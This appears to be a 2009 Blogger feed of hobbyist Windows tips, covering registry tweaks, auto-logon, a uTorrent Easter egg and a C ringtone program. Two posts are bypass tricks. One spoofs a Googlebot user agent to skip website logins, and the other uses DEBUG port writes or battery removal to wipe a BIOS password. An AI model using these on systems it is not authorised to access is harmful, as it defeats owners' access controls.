href='http://www.blogger.com/feeds/7387936170644921109/posts/default/572495114168574998'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/disable-turn-off-option-and-altf4.html' title='Disable Turn Off Option and ALT+F4 option'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4964629515373640768</id><published>2009-11-29T06:40:00.000-08:00</published><updated>2009-11-29T06:40:15.002-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><title type='text'>Can't continue ur game.dll files missing?</title><content type='html'>Hi! friends!! After installing a game u cant continue or start the games..Dont worry&lt;br /&gt;&lt;br /&gt;Dont worry just enter the site&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;http://www.dll-files.com/dllindex/index.shtml  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;All the dll files will be available in alphabetical order &lt;br /&gt;Just click on the dll file that was shown missing in the dialog box... when u start that particular game or application..&lt;br /&gt;&lt;br /&gt;The direct X will be useful and can be easily installed ...this site will provide free download of all '.dll' files and could be installed without the help of an offline directX installer&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4964629515373640768?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/4964629515373640768/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/cant-continue-ur-gamedll-files-missing.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4964629515373640768'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/4964629515373640768'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/cant-continue-ur-gamedll-files-missing.html' title='Can&apos;t continue ur game.dll files missing?'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-954102910939527196</id><published>2009-11-29T06:39:00.001-08:00</published><updated>2009-11-29T06:39:13.818-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vista'/><title type='text'>How To Log On Automatically On Windows Vista</title><content type='html'>Sometimes you don't have extremely important or sensitive information on your computer ( for example a gaming computer ) and you don't like to log in every single time you reboot your computer.&lt;br /&gt;&lt;br /&gt;You can set your computer to log in automatically.&lt;br /&gt;&lt;br /&gt;1. Type control userpasswords2 into the Start menu search box and press Enter to go to Advanced User Accounts Control Panel.&lt;br /&gt;&lt;br /&gt;2. Uncheck the box "Users must enter a user name and password to use this computer", and then press Apply. Enter the right username and password in the boxes shown. Press OK.&lt;br /&gt;&lt;br /&gt;Now your computer will log in automatically each time you start it&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-954102910939527196?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/954102910939527196/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-log-on-automatically-on-windows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/954102910939527196'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/954102910939527196'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-log-on-automatically-on-windows.html' title='How To Log On Automatically On Windows Vista'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8540629698592848944</id><published>2009-11-26T03:57:00.003-08:00</published><updated>2009-11-26T03:57:44.682-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Boot defragment</title><content type='html'>A very important new feature in Microsoft Windows XP is the ability to do a boot defragment. This basically means that all boot files are placed next to each other on the disk drive to allow for faster booting. By default this option is enabled but some upgrade users have reported that it isn't on their setup.&lt;br /&gt;&lt;br /&gt;1. Start Regedit. &lt;br /&gt;2. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOpt imizeFunction &lt;br /&gt;3. Select Enable from the list on the right. &lt;br /&gt;4. Right on it and select Modify. &lt;br /&gt;5. Change the value to Y to enable and N to disable. &lt;br /&gt;6. Reboot your computer.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8540629698592848944?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8540629698592848944/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/boot-defragment.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8540629698592848944'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8540629698592848944'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/boot-defragment.html' title='Boot defragment'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3452095447011050109</id><published>2009-11-26T03:57:00.001-08:00</published><updated>2009-11-26T03:57:19.826-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Skip registering on sites</title><content type='html'>So sometimes u r to lazy to login or u forget password and u quick need some information.&lt;br /&gt;&lt;br /&gt;So good way is faking UA &lt;- User Agent&lt;br /&gt;&lt;br /&gt;I will show u example of firefox&lt;br /&gt;&lt;br /&gt;Type in URL bar following:&lt;br /&gt;&lt;br /&gt;about :config&lt;br /&gt;&lt;br /&gt;then u should see alot of options which can be changed&lt;br /&gt;&lt;br /&gt;1cm down u will see "Filter:"&lt;br /&gt;&lt;br /&gt;Type in box&lt;br /&gt;&lt;br /&gt;"useranget" without quotes&lt;br /&gt;&lt;br /&gt;We need to change just&lt;br /&gt;&lt;br /&gt;general.useragent.extra.firefox&lt;br /&gt;&lt;br /&gt;Deafult is Firefox x.x.x or something like that^^&lt;br /&gt;&lt;br /&gt;So how to bypass login on that websites(also on h4cky0u)?&lt;br /&gt;&lt;br /&gt;just double click &amp; type in that field&lt;br /&gt;&lt;br /&gt;Code: Select all&lt;br /&gt;Googlebot/2.X (&lt;br /&gt;Quote:&lt;br /&gt;http://www.googlebot.com/bot.html  &lt;br /&gt;&lt;br /&gt;)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3452095447011050109?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3452095447011050109/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/skip-registering-on-sites.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3452095447011050109'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3452095447011050109'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/skip-registering-on-sites.html' title='Skip registering on sites'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8164154021309835780</id><published>2009-11-26T03:56:00.001-08:00</published><updated>2009-11-26T03:56:41.267-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>Cool Hidden trick in Utorrent</title><content type='html'>This is a Good trick...&lt;br /&gt;&lt;br /&gt;open utorrent---&gt;help--&gt;about utorrent.&lt;br /&gt;&lt;br /&gt;when it shows a version screen, hit the 't' button&lt;br /&gt;&lt;br /&gt;Now u'll see a tetris game. U can play there itself.&lt;br /&gt;&lt;br /&gt;Just Hit The "t" on Ur KeyBoard and U Shud Be Able To&lt;br /&gt;&lt;br /&gt;Play The Hidden TETRIS Game&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8164154021309835780?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8164154021309835780/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/cool-hidden-trick-in-utorrent_26.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8164154021309835780'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8164154021309835780'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/cool-hidden-trick-in-utorrent_26.html' title='Cool Hidden trick in Utorrent'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8925790146522866404</id><published>2009-11-26T03:55:00.001-08:00</published><updated>2009-11-26T03:55:04.087-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><title type='text'>SPEED UP UR ACROBAT READER</title><content type='html'>1. Go to the installation folder of acrobat reader&lt;br /&gt;&lt;br /&gt;(C:\program files\adobe\acrobat\reader\.. whatever)&lt;br /&gt;&lt;br /&gt;2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy &amp; paste).&lt;br /&gt;&lt;br /&gt;Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).&lt;br /&gt;&lt;br /&gt;Now your acrobat reader will load very fast and almost as good as notepad&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8925790146522866404?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8925790146522866404/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/speed-up-ur-acrobat-reader.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8925790146522866404'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8925790146522866404'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/speed-up-ur-acrobat-reader.html' title='SPEED UP UR ACROBAT READER'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-5687949721536576522</id><published>2009-11-26T03:54:00.001-08:00</published><updated>2009-11-26T03:54:29.848-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>Now you'll no longer need to browse through various folders each time you change Wallpaper</title><content type='html'>This tip is for Windows XP users. When you want to change the desktop wallpaper, you right-click on desktop, select Properties and goto "Desktop" tab. Now you see a few wallpapers in the given list:&lt;br /&gt;&lt;br /&gt;You can select any of them but if your wallpapers are somewhere else, you'll need to click on "Browse" button and then goto that folder and select the desired wallpaper.&lt;br /&gt;&lt;br /&gt;Its not a big deal but what if you are a wallpaper freak and change the wallpaper every day or hour?It might get irritating for you to click on Browse and goto the directory each time.&lt;br /&gt;&lt;br /&gt;Now here I'll show you a way to change the default wallpaper directory in Desktop Properties, so that whenever you'll open it, it'll show the wallpapers present in your desired folder:&lt;br /&gt;&lt;br /&gt;1. Open regedit and goto:&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion&lt;br /&gt;&lt;br /&gt;2. In right-side pane, you'll see a string value "WallPaperDir". Its default value will be:&lt;br /&gt;&lt;br /&gt;%SystemRoot%\Web\Wallpaper&lt;br /&gt;&lt;br /&gt;You have to change it to your desired wallpaper directory path. Suppose your wallpapers are stored in "E:\Wallpapers" directory, then set the value to "E:\Wallpapers".&lt;br /&gt;&lt;br /&gt;3. Exit registry editor and open Desktop Properties again. Now it'll show all wallpapers present in the folder which you set in registry:&lt;br /&gt;&lt;br /&gt;4. Thats it. Now you'll no longer need to browse through varioud folders each time you want to change the wallpaper&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-5687949721536576522?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/5687949721536576522/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/now-youll-no-longer-need-to-browse.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5687949721536576522'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5687949721536576522'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/now-youll-no-longer-need-to-browse.html' title='Now you&apos;ll no longer need to browse through various folders each time you change Wallpaper'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1080813337362935179</id><published>2009-11-26T03:53:00.001-08:00</published><updated>2009-11-26T03:53:40.545-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Folder opens in a new window</title><content type='html'>double-click on any folder in My Computer, it opens in a new window even YOU have selected the option "Always open folders in same window" in "Tools -&gt; Folder Options".&lt;br /&gt;&lt;br /&gt;HOW TO RESOLVE THIS HERE YOU GO&lt;br /&gt;&lt;br /&gt;copy the following codes and paste in a notepad and save as share.reg, double click it, allow the action&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell]&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\explore]&lt;br /&gt;"BrowserFlags"=dword:00000022&lt;br /&gt;"ExplorerFlags"=dword:00000021&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\explore\command]&lt;br /&gt;@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00 ,52,00,6f,00,6f,00,74,00,25,\&lt;br /&gt;00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00 ,72,00,2e,00,65,00,78,00,\&lt;br /&gt;65,00,20,00,2f,00,65,00,2c,00,2f,00,69,00,64,00,6c ,00,69,00,73,00,74,00,2c,\&lt;br /&gt;00,25,00,49,00,2c,00,25,00,4c,00,00,00&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec]&lt;br /&gt;@="[ExploreFolder(\"%l\", %I, %S)]"&lt;br /&gt;"NoActivateHandler"=""&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\app lication]&lt;br /&gt;@="Folders"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\ife xec]&lt;br /&gt;@="[]"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\top ic]&lt;br /&gt;@="AppProperties"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\open]&lt;br /&gt;"BrowserFlags"=dword:00000010&lt;br /&gt;"ExplorerFlags"=dword:00000012&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\open\command]&lt;br /&gt;@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00 ,52,00,6f,00,6f,00,74,00,25,\&lt;br /&gt;00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00 ,72,00,2e,00,65,00,78,00,\&lt;br /&gt;65,00,20,00,2f,00,69,00,64,00,6c,00,69,00,73,00,74 ,00,2c,00,25,00,49,00,2c,\&lt;br /&gt;00,25,00,4c,00,00,00&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec]&lt;br /&gt;@="[ViewFolder(\"%l\", %I, %S)]"&lt;br /&gt;"NoActivateHandler"=""&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\applic ation]&lt;br /&gt;@="Folders"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\ifexec]&lt;br /&gt;@="[]"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\topic]&lt;br /&gt;@="AppProperties"&lt;br /&gt;&lt;br /&gt;[-HKEY_CLASSES_ROOT\Directory\shell\explore]&lt;br /&gt;&lt;br /&gt;[-HKEY_CLASSES_ROOT\Directory\shell\open]&lt;br /&gt;&lt;br /&gt;[-HKEY_CLASSES_ROOT\Drive\shell\open]&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Drive\shell]&lt;br /&gt;@="none"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Directory\shell]&lt;br /&gt;@="none"&lt;br /&gt;&lt;br /&gt;[HKEY_CLASSES_ROOT\Folder\shell]&lt;br /&gt;@=-&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1080813337362935179?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1080813337362935179/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/folder-opens-in-new-window.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1080813337362935179'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1080813337362935179'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/folder-opens-in-new-window.html' title='Folder opens in a new window'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2097368761526528218</id><published>2009-11-26T03:52:00.001-08:00</published><updated>2009-11-26T03:52:58.457-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Clear BIOS Password, All tricks</title><content type='html'>At command prompt type debug&lt;br /&gt;you will get a - prompt where you can type the fallowing ( means hit enter, not type enter*)&lt;br /&gt;A &lt;br /&gt;MOV AX,0 &lt;br /&gt;MOV AX,CX &lt;br /&gt;OUT 70,AL &lt;br /&gt;MOV AX,0 &lt;br /&gt;OUT 71,AL &lt;br /&gt;INC CX &lt;br /&gt;CMP CX,100 &lt;br /&gt;JB 103 &lt;br /&gt;INT 20 &lt;br /&gt;just hit enter on this line&lt;br /&gt;G &lt;br /&gt;Q &lt;br /&gt;Basic BIOS password crack - works 9.9 times out of ten&lt;br /&gt;This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:&lt;br /&gt;Get DOS prompt and type:&lt;br /&gt;DEBUG hit enter&lt;br /&gt;-o 70 2e hit enter&lt;br /&gt;-o 71 ff hit enter&lt;br /&gt;-q hit enter&lt;br /&gt;exit hit enter&lt;br /&gt;Restart the computer. It works on most versions of the AWARD BIOS.&lt;br /&gt;&lt;br /&gt;*Another Trick 2 Clear COMOS + BIOS is Open Ur PC Cabinet And Open The Battery For 5Min And Then Insert It Open Ur Computer And Ur Password Will Be Reset&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2097368761526528218?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2097368761526528218/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/clear-bios-password-all-tricks.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2097368761526528218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2097368761526528218'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/clear-bios-password-all-tricks.html' title='Clear BIOS Password, All tricks'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1837357687638347379</id><published>2009-11-26T03:51:00.001-08:00</published><updated>2009-11-26T03:51:50.385-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Mobile Phones'/><category scheme='http://www.blogger.com/atom/ns#' term='Language'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>Airtel song in C language.</title><content type='html'>Code:&lt;br /&gt;#include&lt;dos.h&gt;&lt;br /&gt;#include&lt;stdio.h&gt;&lt;br /&gt;float main(void)&lt;br /&gt;{&lt;br /&gt;float A,Bb,D,G,F;&lt;br /&gt;A = 440;&lt;br /&gt;G = 780;&lt;br /&gt;Bb = 461;&lt;br /&gt;D = 586;&lt;br /&gt;F = 687;&lt;br /&gt;sound(G);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*D);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*Bb);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(F);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(F);&lt;br /&gt;delay(250);&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;sound(2*Bb);&lt;br /&gt;delay(500);&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(500);&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;sound(F);&lt;br /&gt;delay(250);&lt;br /&gt;sound(D);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;//end 1&lt;br /&gt;sound(G);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*D);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*Bb);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(F);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(F);&lt;br /&gt;delay(250);&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;sound(2*Bb);&lt;br /&gt;delay(500);&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(500);&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;sound(F);&lt;br /&gt;delay(250);&lt;br /&gt;sound(D);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;//end 2&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(F);&lt;br /&gt;delay(250);&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;sound(2*Bb);&lt;br /&gt;delay(500);&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(500);&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;sound(F);&lt;br /&gt;delay(250);&lt;br /&gt;sound(D);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;//end 3&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;nosound();&lt;br /&gt;sound(F);&lt;br /&gt;delay(250);&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(250);&lt;br /&gt;sound(2*Bb);&lt;br /&gt;delay(500);&lt;br /&gt;sound(2*A);&lt;br /&gt;delay(500);&lt;br /&gt;sound(G);&lt;br /&gt;delay(250);&lt;br /&gt;sound(F);&lt;br /&gt;delay(250);&lt;br /&gt;sound(D);&lt;br /&gt;delay(500);&lt;br /&gt;nosound();&lt;br /&gt;return 0;&lt;br /&gt;} &lt;br /&gt;&lt;br /&gt;just copy the code in notepad and save it with extension .C&lt;br /&gt;now u can open this file in c or c++ etc&lt;br /&gt;&lt;br /&gt;how to compile &lt;br /&gt;&lt;br /&gt;after u open the file press alt+f9&lt;br /&gt;&lt;br /&gt;Now open it with C and hear it&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1837357687638347379?l=xynotes.blogspot.com' alt='' 